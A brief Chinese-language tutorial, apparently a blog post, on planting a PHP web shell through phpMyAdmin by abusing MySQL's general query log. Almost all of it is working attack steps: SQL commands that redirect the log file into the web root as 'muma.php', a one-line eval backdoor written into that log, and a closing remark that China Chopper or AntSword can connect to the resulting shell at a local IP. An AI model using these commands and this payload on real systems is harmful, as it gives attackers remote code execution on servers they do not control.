phpmyadmin提权

phpmyadmin的一种简单的提权

利用日志写shell

 

登陆phpmyadmin

 

开启日志记录

 

set global general_log='on';

 

日志文件导出指定目录

 

set global general_log_file='D:/phpstudy_pro/WWW/muma.php';

 

记录sql语句写马，这里我就是演示一下，没有安全狗，直接传原马

 

select '<?php @eval($_POST["hp"]); ?>';

 

关闭记录

 

set global general_log=off;

 

PHP小马位置http://192.168.166.1/muma.php

菜刀，蚁剑都可以连接